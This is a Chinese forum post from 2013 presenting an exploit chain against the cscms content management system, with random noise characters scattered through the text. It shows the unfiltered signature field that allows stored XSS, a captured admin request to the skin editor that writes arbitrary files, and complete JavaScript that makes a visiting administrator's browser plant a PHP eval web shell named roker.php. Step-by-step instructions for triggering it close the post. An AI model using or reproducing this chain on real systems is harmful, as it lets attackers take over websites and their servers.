|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题0 l- _4 S2 R3 Q
官网已经修补了,所以重新下了源码0 }5 p3 p M* Q0 Z9 P
因为 后台登入 还需要认证码 所以 注入就没看了。
* u' n% x9 O% K, {+ s存在 xss
6 l. n) @6 q* |: r8 f) ~( N漏洞文件 user/member/skin_edit.php% Y! g! r" Z! |$ V5 J5 G; v
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:5 z. y/ Y2 f M0 L& V# i1 K
) n X. z4 D, ?& N# u h$ H! {</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
7 W H4 f7 n2 i! l! J7 R7 c |" a 7 ~" [( @+ Q# l) a& W; C, ?0 L. `
</textarea></td></tr>
; J' M: t, Q9 o
, W- L$ x+ M+ t7 G! a user/do.php , Z2 p: N: v1 h+ u5 Z
. C2 a# |8 f5 @
6 m/ S4 Y1 Y& s: L$ l6 m! Y6 W' d
if($op=='zl'){ //资料
/ |9 |4 w7 I% a1 @ @ E6 v 1 Q+ H# o+ \& y
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) : i, G# C b/ p. p7 H9 b5 ]
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));$ ~- F; x% _9 J1 A) H8 ]
! T% A! Y9 z9 e# ^
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
, _0 t O+ H8 `* Y; Y9 |+ r B8 z: u, V/ X- o
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
; E( t$ `# _- O0 b& T where CS_Name='".$cscms_name."'";
! H5 d, c& u$ J) P& d) A4 i' {
6 H/ o& W+ ?+ I8 a if($db->query($sql)){
3 d0 a0 Q0 A3 Y8 G! a0 F5 h
z9 c4 c( m* \ exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));1 {" r3 E6 c: Q1 K6 j( G* M' f% |
2 v+ O6 O S# n5 g% M
}else{& q# v5 |/ D. A
7 [; }! S9 N* s( h exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));' v8 X7 r6 C: I7 I) Y
7 Q9 d! v' j) c, J8 a
}/ `& C9 R/ Q, l2 V
$ n2 B6 w+ T2 |3 K, l7 b
1 a# ]: z, }/ w" N' d1 {没有 过滤导致xss产生。
7 a# G( {6 J" f/ k2 v, \# X# j后台 看了下 很奇葩的是可以写任意格式文件。。
* q# R) m$ s, A: n Q" ]8 N抓包。。
9 B* U' y2 Y1 w- z1 U# l7 F; e- I, Y$ A5 Q
- V' t2 o, O0 Z- ?8 h5 \- d W
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
. x7 b' e Q# ^2 Y) p0 P# [
4 K% V! w5 m% ]' c" A$ tAccept: text/html, application/xhtml+xml, */*
3 V; A+ d$ L; x$ ?$ G 5 Y* u- }" |2 i4 P# [- J9 F
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php9 ?3 ]+ }$ Q0 L" D# d; z
: G' L) I0 u8 o& j0 {% v! d0 ^
Accept-Language: zh-CN" h% G& E4 x6 F8 u' t
$ T8 T' `+ I. B' M+ P( ^/ B) ~
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
2 {# `% L; r2 q o/ m7 l ! f$ w. b5 \5 i- X. \8 ^. `
Content-Type: application/x-www-form-urlencoded
7 c4 L* J: L. |/ w, g# e
/ U7 C) @) B0 w% E1 s; u% GAccept-Encoding: gzip, deflate
# Q4 L# z1 O" [% P- L
- i0 a9 r. l' B& s$ X4 H; H" Z( A2 K! iHost: 127.0.0.1! V5 b9 v2 k$ F6 G' Q
9 g! M/ b7 X$ d
Content-Length: 38; i% c! L! A6 E8 U
( w; N8 \- s1 g2 BDNT: 1. _4 j2 n+ t' O' _
3 ]+ F* |+ z3 a: x1 e" j
Connection: Keep-Alive
. e$ ^1 F2 L( K / e: C( @2 p! O* B! M3 w
Cache-Control: no-cache
5 ^- R& @8 Y/ z: e5 a9 f* a9 L
, j( c6 N( e: aCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594; j8 ~# P/ a( ?) ]& C' {$ N
9 ?2 w0 x. W2 C5 I( {, ~ g" ^1 e2 f+ H8 h4 r: b* ]
name=aaa.php&content=%3Cs%3E%3Ca%25%3E4 k+ o; V k* `5 M/ X5 f
% c/ k8 N! G) r5 j: k4 J0 J* u1 \& P2 ^
" x+ z7 o5 X8 U4 I; y4 `* J( B
于是 构造js如下。
: a. ?( D5 [2 @' i& {% i+ B* @! ^- v# K; o
本帖隐藏的内容<script>
! r% T) Y* p' ]. J+ R' GthisTHost = top.location.hostname;
( H, m6 X c/ c( w% q
5 j4 I& k; W2 {thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
# k0 o) S! H8 r1 G) _" A8 Y 2 Y! _$ D. _- J9 x B6 @1 {
function PostSubmit(url, data, msg) {
+ n" I% Q8 C9 I2 R2 L+ z, J var postUrl = url;
( \0 I8 t0 V4 y# A; u , g0 @1 \0 A* N' v* W2 m
var postData = data; 1 G5 ?- p$ k( Q2 E, \
var msgData = msg; 4 ~& Y1 b: W! W- @9 T! j4 P9 Z
var ExportForm = document.createElement("FORM"); 6 t/ J9 [# R8 D7 \1 e
document.body.appendChild(ExportForm); ) O5 J, V r p4 c, [- Q+ W2 v3 p
ExportForm.method = "POST"; 8 M+ H3 O# y8 L; ]3 O! ~4 l
var newElement = document.createElement("input");
% b4 r# d2 o, {" c: @ newElement.setAttribute("name", "name"); . p7 s& C' o9 c9 s; e
newElement.setAttribute("type", "hidden"); 1 k7 |8 E9 S! O
var newElement2 = document.createElement("input"); ( Y; X3 Y7 b0 s4 p
newElement2.setAttribute("name", "content");
0 Y% c+ Z% S! f0 p, D2 k3 H newElement2.setAttribute("type", "hidden");
7 `8 H. N1 `, Y( P; m2 u ExportForm.appendChild(newElement); . S+ U# \- o2 Y# r% z4 `
ExportForm.appendChild(newElement2);
7 T h) h0 u1 D" A newElement.value = postData; 8 v1 L# {; h; h M& U6 @& g, j
newElement2.value = msgData; ! u% e4 j# l6 ?6 r# l% q# W
ExportForm.action = postUrl;
5 P6 k6 P: |& j% |- x ExportForm.submit();
% X6 G5 }- a: c' ~; w: A9 O) V4 p# E};7 ^0 T& l. g) o4 {
% I8 }0 W; v" L" y
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
/ h& G8 a, f9 k4 ?
6 B. r; S/ r; j</script>- u& r* n E# `# t3 ?8 Z
: E5 J7 h/ R9 q; `& q# X
: u5 \2 X: R3 N
8 f( J8 Z& ?2 W, W& P7 A6 fhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
2 `1 Z4 L& m0 X: z2 n% _0 u& n; h用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改); F+ L& x+ D: |+ p& H$ Q* k7 T
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
$ e* G! p" a* f6 a
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对